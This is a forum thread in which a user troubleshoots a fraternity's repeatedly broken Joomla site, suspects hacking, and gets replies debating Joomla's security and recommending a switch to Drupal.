Website being hacked (I think)
airbornflght
Houston, TX Icrontian
Ok, first time site got comrpmised I was willing to think it was something I did. But last night I spent about 4 hours laying a new install of joomla down and getting it back to around 95%. I installed only one component and everything was working beautifully when I went to bed.
Now the site has gone to hell again. Now I am more than willing to say someone else is maliciously accessing the site. And I can't get siteground's pos raw access logs to work. The only other ip I could find in cpanel that was accessing the house. 66.249.65.43. I googled it and it appears that it is a part of a botnet.
I'm getting pissed and I want to find out who is doing this and why they hell anyone would want to compromise a local fraternity chapter's website. And is joomla really this full of holes?
Now the site has gone to hell again. Now I am more than willing to say someone else is maliciously accessing the site. And I can't get siteground's pos raw access logs to work. The only other ip I could find in cpanel that was accessing the house. 66.249.65.43. I googled it and it appears that it is a part of a botnet.
I'm getting pissed and I want to find out who is doing this and why they hell anyone would want to compromise a local fraternity chapter's website. And is joomla really this full of holes?
0
Comments
http://ws.arin.net/whois/?queryinput=66.249.65.43
I was getting php errors. One on the admin backend was something like could not authenticate or something. I forget the exact php error that was thrown but I couldn't not login to the admin backend. And on the front end all of my menu's were gone as well as content.
I should have copied the thrown errors, but I was in such a hurry to get the site back up I didn't think to.
And before when I tried to look at the public site nothing was shown but a php error. Saying that a file was missing out of the includes directory that was being called from index. I may not be a php/webmaster expert but I know enough that I haven't touched any files or modified any code that would do such a thing.
And twice in a row? I'm less willing to toss that up to happenstance. And I had nothing to do with this hosting company. They've been with siteground for 3 or 4 years now. I wanted to switch but they are so damn cheap. Their customer service sucks though. took me an hour to find an email address and it was to report tos abuses. I don't care as long as someone reads it. I want access logs. I am steaming right now. I'm just grateful the database hasn't been tampered with.
I found these in Cpanel's analog stats. These are failed requests. The one's in bold further my suspicions that someone is actively trying to find holes and exploit them.
A) Exploiting Joomla, to my knowledge, isn't easy, especially if it's up-to-date
and B) No one cares about your website (sorry, but keep perspective)
and C) Exploits usually involve either defacing the site (which didn't happen) or stealing your data (which there is none to take) not creating PHP errors
and D) No one "tries to find holes" in your Joomla software, they have their own copies for that. They just pwn yours after they find them
therefore E) This is probably a software issue or someone else with access messing up (accidental or malicious I know not)
Theres your mistake right there.
That CMS makes phpnuke look secure.
Also make sure your php is is safe mode (If your web host supports it).
Almost all bots/scriptkiddies that will try to attack your site will be stopped in their tracks when they cant do anything useful once they get shell.
A) Joomla takes their sweet time fixing security exploits, When I had Joomla there was a point where an exploit could be used to get shell was on the usual places for over a month before it was patched. As they were taking too long to fix it I switched to a better cms (Drupal)
edit: The amount of RFI, and SQL injections out there for joomla is probably higher then most cms's
B) Bots hack indiscriminately, It doesnt matter if its a charity site or if its microsoft.com if your vulnerable to a particular exploit its looking for when it finds your box it will run its script and likely deface your site. (It also might install a phpshell)
C) Exactly right, If he posted the error it might be more use in trouble shooting.
D), E) I fully agree with you there.
edit: Keebler if your interested in seeing some of these exploits please PM me and I can link you.
For instance: http://www.okstatedelts.com/administ...hidemainmenu=1
I know for a fact that it wasn't me. (I was sleeping) and none of the other guys in the house know enough about a computer to even find the backend nor do they have a reason. We don't have any disgruntled ex-members as far as I know. But I changed all the account info that has been the same for as long as they've had the account.
You may say that no one cares enough to do anything to our little site. And I agreed with you the first time it happened. I thought who the hell cares enough about us the deface our site? Obviously someone does. Because things like this don't happen three times within a month on their own. I don't know if it's internal or external but if siteground is worth a damn they will get me the access logs as the ones from cpanel were inaccessible (just an executable that did nothing once clicked)
And that one ip address I posted earlier I googled and it seemed to bring up a lot of results about botnets. But even then why would someone attack websites indiscriminately just for the hell of it?
Normal they just deface them for political reasons or some other bs :/.
Have you considered switching to drupal ?
is their a migration script? I just (within last 2 months) got everything onto joomla 1.5.
Things I need out of a cms are the ability to provide a photogallery, document management/gallery/display type thing, integrate with google calendar, and provide a form function that keeps track of stuff in a like fascileforms does.
Other than that I'm open to switching. It's basically the 3rd party support for joomla that drew me too it. As well as its semi-simple backend and ui.
Theres probably downloadable modules for everything you need, But I dont think there is a migration script.
As for drupal itself I wish I had found it first before setting up some mambo sites. Now I'm at the road, where I've got a lot done to make the mambo sites look right and I don't know if I want to flip them to Drupal. But any new sites I've been working on are going to be drupal.